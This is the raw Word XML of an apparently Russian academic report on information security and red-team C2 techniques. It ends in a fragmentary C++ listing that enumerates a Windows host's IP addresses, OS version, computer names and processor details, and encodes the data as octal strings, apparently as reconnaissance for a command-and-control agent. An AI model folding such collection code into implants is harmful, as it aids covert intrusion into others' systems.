      </w:pP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Компромисс бюджета и информационной безопасности [Электронный источник]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URL:</w:t>
      </w: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hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="00DB04F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https://www.ptsecurity.com/ru</w:t>
        </w:r>
        <w:r w:rsidRPr="00DB04F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-</w:t>
        </w:r>
        <w:r w:rsidRPr="00DB04F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ru/research/analytics/regional-information-security-2018/#id3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0CAE9F94" w14:textId="57F49767" w:rsidR="00DB04FF" w:rsidRPr="00DB04FF" w:rsidRDefault="00DB04FF" w:rsidP="00DB04F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709" w:hanging="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB04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Опубликован рейтинг CNews Security: рынок ИБ поставил новый рекорд [Электронный источник] – URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidRPr="00DB04FF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https://www.cnews.ru/news/top/2019-12-03_opublikovan_rejting_cnews_security</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="050615C9" w14:textId="75C98657" w:rsidR="00285DFD" w:rsidRDefault="00285DF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33AAD8" w14:textId="77777777" w:rsidR="00DB04FF" w:rsidRPr="003F5014" w:rsidRDefault="00DB04F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8625BE" w14:textId="77777777" w:rsidR="00F24247" w:rsidRPr="00F24247" w:rsidRDefault="00872B4F" w:rsidP="00F2424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72B4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используемых сокращений и аббревиатур:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CFC26E" w14:textId="4F4739ED" w:rsidR="00F24247" w:rsidRPr="00F24247" w:rsidRDefault="00B41F73" w:rsidP="00F2424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RT</w:t>
      </w:r>
      <w:r w:rsidRPr="00F242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 w:rsidRPr="00F24247">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Red Team</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DAB43A" w14:textId="77777777" w:rsidR="00F24247" w:rsidRDefault="00F24247" w:rsidP="00F2424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4247">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia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Information Technology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF598B5" w14:textId="4DCB4A88" w:rsidR="00F24247" w:rsidRDefault="00F24247" w:rsidP="00F2424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ИБ</w:t>
      </w:r>
      <w:r w:rsidRPr="00F242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F242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Информационная</w:t>
      </w:r>
      <w:r w:rsidRPr="00F242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безопасность</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF7178E" w14:textId="63EEEC36" w:rsidR="001661D9" w:rsidRDefault="001661D9" w:rsidP="00F2424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APT – Advanced Persistent Threat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE8D17F" w14:textId="1AE2FD69" w:rsidR="001661D9" w:rsidRDefault="001661D9" w:rsidP="00F2424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C2 – Command and Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112066EF" w14:textId="5F683F3E" w:rsidR="001661D9" w:rsidRDefault="001661D9" w:rsidP="00F2424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ICMP – Internet Control Message Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4F24F6" w14:textId="5D0238DE" w:rsidR="001661D9" w:rsidRDefault="001661D9" w:rsidP="00F2424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DNS – Domain Name</w:t>
      </w:r>
      <w:r w:rsidR="00B750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System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA6350F" w14:textId="40D65F49" w:rsidR="001661D9" w:rsidRDefault="001661D9" w:rsidP="00F2424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– Программное обеспечение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B12403E" w14:textId="2CB7D2A7" w:rsidR="001661D9" w:rsidRDefault="001661D9" w:rsidP="00F2424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 – Операционная система</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23191694" w14:textId="4EE3C470" w:rsidR="001661D9" w:rsidRDefault="001661D9" w:rsidP="00F2424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VNC – Virtual Network Computing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F3DD6C" w14:textId="394578A4" w:rsidR="001661D9" w:rsidRDefault="001661D9" w:rsidP="00F2424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IP – Internet Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3931EF77" w14:textId="4725A31C" w:rsidR="001661D9" w:rsidRDefault="001661D9" w:rsidP="00F2424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IPS – Intrusion Prevention System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EF36A7" w14:textId="4838E6B8" w:rsidR="00B22CF1" w:rsidRDefault="00B22CF1" w:rsidP="00F2424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 – Hypertext Transfer Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F80672" w14:textId="585F7A78" w:rsidR="00B22CF1" w:rsidRDefault="00B22CF1" w:rsidP="00F2424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PDF – Portable Document Format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EA35F8" w14:textId="59824B16" w:rsidR="00B22CF1" w:rsidRDefault="00B22CF1" w:rsidP="00F2424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FTP – File Transfer Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76875DC9" w14:textId="586D2D89" w:rsidR="00B22CF1" w:rsidRDefault="00B22CF1" w:rsidP="00F2424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VPN – Virtual Private Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F78D49B" w14:textId="5E94FCBF" w:rsidR="00B22CF1" w:rsidRDefault="00B22CF1" w:rsidP="00F2424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P2P </w:t>
      </w:r>
      <w:r w:rsidR="00E34E90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34E90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Peer-to-Peer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B10634" w14:textId="74AFAD70" w:rsidR="00E34E90" w:rsidRDefault="00E34E90" w:rsidP="00F2424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 – Application Programming Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129D8BB7" w14:textId="77944742" w:rsidR="00E34E90" w:rsidRDefault="00E34E90" w:rsidP="00F2424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SSL – Secure Socket Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7EA691" w14:textId="310A8AB3" w:rsidR="00E34E90" w:rsidRDefault="00E34E90" w:rsidP="00F2424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NTLM – New Technology LAN Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C77BB15" w14:textId="0C53E0B7" w:rsidR="00E34E90" w:rsidRDefault="00E34E90" w:rsidP="00F2424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DLL – Dynamic-link library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E0838E" w14:textId="2598EAB1" w:rsidR="00E34E90" w:rsidRDefault="00E34E90" w:rsidP="00F2424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TCP – Transmission Control Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76704776" w14:textId="77777777" w:rsidR="00E34E90" w:rsidRPr="001661D9" w:rsidRDefault="00E34E90" w:rsidP="00F2424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2757BC5" w14:textId="007897CE" w:rsidR="00872B4F" w:rsidRDefault="00872B4F" w:rsidP="007F03E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2424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Pr="00F2424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Pr="00F2424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14:paraId="2D645B1B" w14:textId="77777777" w:rsidR="007F03E4" w:rsidRPr="00F24247" w:rsidRDefault="007F03E4" w:rsidP="007F03E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C9162C" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00F24247" w:rsidRDefault="00872B4F" w:rsidP="00872B4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7875660" w14:textId="77777777" w:rsidR="002A3235" w:rsidRPr="00F24247" w:rsidRDefault="00EE779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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F2424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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A233EF" w14:textId="77777777" w:rsidR="00375B3D" w:rsidRPr="00375B3D" w:rsidRDefault="00375B3D" w:rsidP="00375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B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5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B3D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;winsock2.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AF39D4" w14:textId="77777777" w:rsidR="00375B3D" w:rsidRPr="00375B3D" w:rsidRDefault="00375B3D" w:rsidP="00375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B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5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B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75B3D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>iphlpapi.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00375B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14A6A56" w14:textId="77777777" w:rsidR="00375B3D" w:rsidRPr="00375B3D" w:rsidRDefault="00375B3D" w:rsidP="00375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B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5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B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75B3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75B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EDE2370" w14:textId="77777777" w:rsidR="00375B3D" w:rsidRPr="00375B3D" w:rsidRDefault="00375B3D" w:rsidP="00375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B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5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B3D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;ws2tcpip.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B022A05" w14:textId="77777777" w:rsidR="00375B3D" w:rsidRPr="00375B3D" w:rsidRDefault="00375B3D" w:rsidP="00375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B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5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B3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D12F3B6" w14:textId="77777777" w:rsidR="00375B3D" w:rsidRPr="00375B3D" w:rsidRDefault="00375B3D" w:rsidP="00375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B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5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B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75B3D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375B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B1C4430" w14:textId="77777777" w:rsidR="00375B3D" w:rsidRPr="00375B3D" w:rsidRDefault="00375B3D" w:rsidP="00375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B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5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B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75B3D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375B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670D2B0" w14:textId="77777777" w:rsidR="00375B3D" w:rsidRPr="00375B3D" w:rsidRDefault="00375B3D" w:rsidP="00375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B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5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B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75B3D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sysinfoapi.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00375B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14F571F" w14:textId="77777777" w:rsidR="00375B3D" w:rsidRPr="00375B3D" w:rsidRDefault="00375B3D" w:rsidP="00375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B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5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B3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BCE080B" w14:textId="77777777" w:rsidR="00375B3D" w:rsidRPr="00375B3D" w:rsidRDefault="00375B3D" w:rsidP="00375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B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5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B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75B3D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tchar.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00375B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A176849" w14:textId="77777777" w:rsidR="00375B3D" w:rsidRPr="00375B3D" w:rsidRDefault="00375B3D" w:rsidP="00375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B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5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B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75B3D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VersionHelpers.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00375B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F088DA4" w14:textId="77777777" w:rsidR="00375B3D" w:rsidRPr="00375B3D" w:rsidRDefault="00375B3D" w:rsidP="00375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B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5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B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75B3D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>winsock.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00375B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62E8D3D" w14:textId="77777777" w:rsidR="00375B3D" w:rsidRPr="00375B3D" w:rsidRDefault="00375B3D" w:rsidP="00375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5B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5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B3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75B3D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375B3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E095E04" w14:textId="72ED53FE" w:rsidR="002A3235" w:rsidRPr="00F24247" w:rsidRDefault="00375B3D" w:rsidP="00375B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5B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75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5B3D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1953809F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039A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39A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"Iphlpapi.lib"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7A1F97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039A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39A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"ws2_32.lib"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1AB6CC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6EE3B33B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5FD9D7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4ED3D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powmod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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>base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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modulo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7E18B9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8749B2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7A231F5B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3039A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3076E344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F96F42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23039A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1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0B2E22BA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F6F4B1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 = (1ll * res * </w:t>
      </w:r>
      <w:r w:rsidRPr="0023039A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>base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gramStart"/>
      <w:r w:rsidRPr="0023039A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modulo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415E9D7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B8B825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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>base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(1ll * </w:t>
      </w:r>
      <w:r w:rsidRPr="0023039A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>base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3039A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>base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gramStart"/>
      <w:r w:rsidRPr="0023039A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modulo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47D3185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&gt;&gt;= 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21E17922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1F0E192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res;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="710A7E2B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97398C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878880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DecimalToOctal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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dec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88C6BC5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039A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dec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"0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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E0F332B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octStr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82AC0DB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039A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dec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3B3548EE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63BB538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octStr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octStr.insert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39A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dec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% 8));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA3E841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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dec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8;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1A11E753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BE4093C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octStr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6431179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021E28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BBE25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ASCIIToOctal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39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CA7493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oct =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FE6EACB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3039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8CA3ADA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406D27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A82E3C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cOct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DecimalToOctal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039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2028F10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cOctLen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cOct.length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737156E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cOctLen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3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073DF4C8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039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(3 -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cOctLen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E44BA2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cOct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cOct.insert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73681C8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cOct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"000"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1DC048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D664FD7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oct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cOct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911C21A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9500E80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oct;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6F492109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853C9F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737E66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string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ListIpAddresses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EC4D257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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP_ADAPTER_ADDRESSES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adapter_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addresses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C631CA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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP_ADAPTER_ADDRESSES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adapter(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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70F897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adapter_addresses_buffer_size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16 * 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1024;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="65FD630A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attempts = 0; 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attempts !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= 3; ++attempts) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CD5A97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adapter_addresses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23039A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP_ADAPTER_ADDRESSES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adapter_addresses_buffer_size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191DA3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= ::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GetAdaptersAddresses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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AF_UNSPEC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F92B454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GAA_FLAG_SKIP_ANYCAST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|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1CEA9C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GAA_FLAG_SKIP_MULTICAST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|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02613253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GAA_FLAG_SKIP_DNS_SERVER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|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D450D9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GAA_FLAG_SKIP_FRIENDLY_NAME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D2E859B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CC83D97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adapter_addresses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8EF78C3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&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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adapter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_addresses_buffer_size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F89F71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ERROR_SUCCESS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error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E097A48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CA4F9E4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138295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ERROR_BUFFER_OVERFLOW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error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47857767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free(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adapter_addresses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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6428C1F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adapter_addresses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2067C12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DD28D36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80462E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1112C66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free(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adapter_addresses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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AE12F27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adapter_addresses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BDACCCC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3EFA1F3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24BA39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B08F978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57457E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119E88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3FBA43D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(adapter =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adapter_addresses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gramStart"/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= adapter; adapter = adapter-&gt;Next) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D8BA63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IF_TYPE_SOFTWARE_LOOPBACK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adapter-&gt;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IfType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73361D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EEFE1B0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"[ADAPTER]: %S\n"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, adapter-&gt;Description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3B1C6D3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"[NAME]:    %S\n"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, adapter-&gt;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FriendlyName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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62554BB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23039A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PWCHAR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1308019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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PWCHAR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(adapter-&gt;Description), S2 = (adapter-&gt;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FriendlyName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S3;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0CAF03CB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3039A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str1(S1), str2(S2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1314BE1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"[ADAPTER]:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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B38B501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str1.length();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984BF07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4A15D50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"\n[NAME]:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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D85A3DF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str2.length();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AEC8BBD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FB99072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039A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP_ADAPTER_UNICAST_ADDRESS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* address = adapter-&gt;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FirstUnicastAddress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gramStart"/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= address; address = address-&gt;Next) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE76DDD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family = address-&gt;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Address.lpSockaddr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sa_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family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56E61EC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AF_INET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family) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AF5BC6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039A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOCKADDR_IN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ipv4 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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3039A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOCKADDR_IN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*&gt;(address-&gt;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Address.lpSockaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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06087E1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str_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buffer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16] = { 0 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7249B17B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inet_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ntop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AF_INET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, &amp;(ipv4-&gt;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sin_addr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str_buffer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, 16);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102AA75C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"[IP]:      %s\n"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str_buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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F6328A5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"\n[IP]:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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A1B32EF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str_buffer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07DD15D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str_buffer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5D5D51F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5DD550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CD29BE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gramStart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AC72309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497CEE9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free(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adapter_addresses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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EE994CA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adapter_addresses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1FDE28D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3E8F48B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3AFA509D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GetOsVersionName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F361E4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FF2CEA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6AD29E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(IsWindows10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OrGreater(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B1EC76B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6D553C7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"Windows10OrGreater\n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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0FBAF2B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27BCF1A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(IsWindows8Point1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OrGreater(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2C4E10E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5FA89EF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"Windows8Point1OrGreater\n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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78A8A58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EA0764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(IsWindows8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OrGreater(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52A74B8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8CCBE89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"Windows8OrGreater\n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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1B68C2C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32C5E4F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(IsWindows7SP1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OrGreater(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82ACCDF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026E7D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"Windows7SP1OrGreater\n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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1558554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E8D223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(IsWindows7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OrGreater(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6D274C2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2D633D6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"Windows7OrGreater\n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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8F47DF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9C51986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(IsWindowsVistaSP2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OrGreater(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970D643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D8A51A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"VistaSP2OrGreater\n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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A42AB57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AB3FABB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(IsWindowsVistaSP1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OrGreater(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5A68E68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1B207A5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"VistaSP1OrGreater\n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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5DC12F1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6CF84C3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IsWindowsVistaOrGreater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225052D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449579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VistaOrGreater</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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proofErr w:type="gramStart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F26FBD5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597C8AF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(IsWindowsXPSP3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OrGreater(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AFAC528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16A525E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"XPSP3OrGreater\n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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6E6BAE2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C9C6F09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(IsWindowsXPSP2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OrGreater(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85C545B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1D07B8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"XPSP2OrGreater\n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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9BDDD76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3E5B382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(IsWindowsXPSP1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OrGreater(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E24728B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4B231F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"XPSP1OrGreater\n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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88F5A4A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E87B6A7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IsWindowsXPOrGreater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777027A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BA6EC0C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XPOrGreater</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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proofErr w:type="gramStart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DBA473A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E4B3EC2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IsWindowsServer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7B36548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413599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"Server\n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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8B2227F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E23BE7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620D79F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4FCCC46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"Client\n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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1356749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8C8046E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5ED08B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tmain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734382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F191FE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cnf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0,error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=0, ch_f1 = 10,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chislo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A7A86DB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23039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R_I_S =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tik =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9944145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BUFF_SIZE = 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1024;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0798D960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servBuff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BUFF_SIZE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD7DB2B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2048];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFFC94E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6BDA7027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buffer[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256] = </w:t>
      </w:r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0D7890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szDescription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8][32] = { </w:t>
      </w:r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"NetBIOS"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3DD6F179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"DNS hostname"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79FA7B88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"DNS domain"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196202AD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"DNS fully-qualified"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600D5A79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"Physical NetBIOS"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7B54B390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"Physical DNS hostname"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7B7992D2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"Physical DNS domain"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020277B5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"Physical DNS fully-qualified"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 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B70025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dwSize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countof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(buffer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E8D576D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cnf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cnf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3039A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ComputerNameMax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cnf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F5F9BC1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E72CED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GetComputerNameEx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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23039A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>COMPUTER_NAME_FORMAT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cnf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, buffer, &amp;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dwSize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CB37CEE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CC819E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GetComputerNameEx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> failed (%d)\n"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C9544FD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5849FC3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F1CD70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tprintf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"%s: %s\n"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szDescription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cnf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], buffer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4663141C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R_I_S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proofErr w:type="gramStart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2074884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32;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C75E1B2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603929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szDescription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cnf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7DCF62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C89B53F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R_I_S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szDescription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cnf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9FB1923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003919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R_I_S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"]:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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09B1E57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3039A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test(&amp;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buffer[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14:paraId="69E7DA87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test2(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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test.begin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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test.end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EB74E99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R_I_S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test2;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="594F3074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R_I_S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gramStart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E02A922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dwSize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countof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(buffer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71F52C5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buffer,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dwSize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B72C1A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923C7CB" w14:textId="54B24723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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_SYSTEM_INFO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sysinfo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                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB4BB97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GetNativeSystemInfo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sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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C8D9201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proofErr w:type="spellStart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sysinfo.dwNumberOfProcessors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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s2 =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sysinfo.dwProcessorType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s3 =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sysinfo.wProcessorArchitecture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s4 =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sysinfo.wProcessorLevel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s5 =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sysinfo.wProcessorRevision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271DD6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R_I_S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proofErr w:type="spellStart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NumOfProc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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]:"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(s1)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"\n[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ProcType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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]:"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(s2)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"\n[Arch]:"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(s3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DB05CC2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R_I_S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"\n[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ProcLvl</w:t>
      </w:r>
